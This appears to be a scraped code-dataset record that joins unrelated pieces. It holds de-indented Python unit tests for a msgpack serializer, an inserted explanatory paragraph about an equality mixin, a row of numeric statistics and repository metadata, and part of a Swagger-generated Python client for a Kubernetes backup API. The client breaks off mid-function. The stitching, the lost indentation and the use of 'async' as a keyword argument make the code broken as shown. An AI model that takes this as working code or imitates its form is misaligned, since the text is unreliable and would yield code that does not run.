class MultiSlotClass:
__slots__ = 'a', 'b'
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
for attr in self.__slots__:
if getattr(self, attr) != getattr(other, attr):
return False
return True
def test_encode_multi_slot_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.MultiSlotClass)
o = self.MultiSlotClass(1, 2)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class FirstComponentClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
class SecondComponentClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
class CompoundClass:
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_compound_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.CompoundClass)
coder.set_default_coder_for_class(self.FirstComponentClass)
coder.set_default_coder_for_class(self.SecondComponentClass)
o = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
def test_encode_compound_of_compound_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.CompoundClass)
coder.set_default_coder_for_class(self.FirstComponentClass)
coder.set_default_coder_for_class(self.SecondComponentClass)
a = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
b = self.CompoundClass(self.FirstComponentClass(1), self.SecondComponentClass(2))
o = self.CompoundClass(a, b)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
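Every test class above re-implements the same type-and-`__dict__` equality check. A hypothetical mixin (not part of the original test suite) that captures the pattern once:

```python
class DictEqMixin(object):
    """Equality by exact type and __dict__, the check repeated by each test class."""

    def __eq__(self, other):
        return type(self) is type(other) and self.__dict__ == other.__dict__

    def __ne__(self, other):  # needed on Python 2; harmless on Python 3
        return not self.__eq__(other)

class Point(DictEqMixin):
    def __init__(self, x, y):
        self.x = x
        self.y = y
```

Classes under test could then inherit `DictEqMixin` instead of redefining `__eq__`; the `__slots__`-based classes would still need their attribute-walking variant, since they have no `__dict__`.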
| 28.530726 | 89 | 0.573918 | 592 | 5,107 | 4.652027 | 0.108108 | 0.019608 | 0.069717 | 0.078431 | 0.815904 | 0.810094 | 0.810094 | 0.785403 | 0.713871 | 0.713871 | 0 | 0.011727 | 0.332093 | 5,107 | 178 | 90 | 28.691011 | 0.795661 | 0 | 0 | 0.75 | 0 | 0 | 0.000783 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.131944 | false | 0 | 0.020833 | 0 | 0.340278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a9d1a0a957581feff7fc982e1e891289eb123910 | 319,244 | py | Python | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 3 | 2018-04-23T09:07:04.000Z | 2019-09-27T10:25:29.000Z | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 2 | 2018-04-09T09:00:17.000Z | 2021-03-01T11:23:11.000Z | python-client/swagger_client/api/stash_appscode_com_v1alpha1_api.py | tamalsaha/kube-openapi-generator | 6607d1e208965e3a09a0ee6d1f2de7e462939150 | [
"Apache-2.0"
] | 2 | 2018-12-12T11:43:54.000Z | 2019-06-29T12:15:07.000Z | # coding: utf-8
"""
stash-server
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class StashAppscodeComV1alpha1Api(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_stash_appscode_com_v1alpha1_namespaced_recovery(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
create a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_recovery(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
create a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_stash_appscode_com_v1alpha1_namespaced_repository(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
create a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_repository(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
create a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_stash_appscode_com_v1alpha1_namespaced_restic(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
create a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_restic(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
create a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Restic', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
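
    # Hedged usage sketch (illustrative comment only, not generated code).
    # Assumptions: an instantiated client `api` for this class exists, the
    # `demo` namespace exists, and the body model is imported from this
    # client package; all of those names are hypothetical.
    #
    #     body = ComGithubAppscodeStashApisStashV1alpha1Restic()
    #     (restic, status_code, headers) = \
    #         api.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(
    #             'demo', body, pretty='true')
    #     # Passing async=True instead returns a thread; call thread.get()
    #     # to obtain the same (data, status, headers) tuple.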
def delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery # noqa: E501
delete collection of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
else:
            data = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, **kwargs)  # noqa: E501
return data
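
    # Hedged usage sketch (illustrative comment only): assumes a configured
    # `api` instance; the namespace and label selector values are hypothetical.
    #
    #     # Synchronous call returns an IoK8sApimachineryPkgApisMetaV1Status.
    #     status = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(
    #         'demo', label_selector='app=stash-demo')
    #     # Asynchronous call returns the request thread instead.
    #     thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(
    #         'demo', label_selector='app=stash-demo', async=True)
    #     status = thread.get()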
def delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery # noqa: E501
delete collection of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_collection_namespaced_repository(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_repository # noqa: E501
delete collection of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
else:
            data = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, **kwargs)  # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_repository # noqa: E501
delete collection of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_collection_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
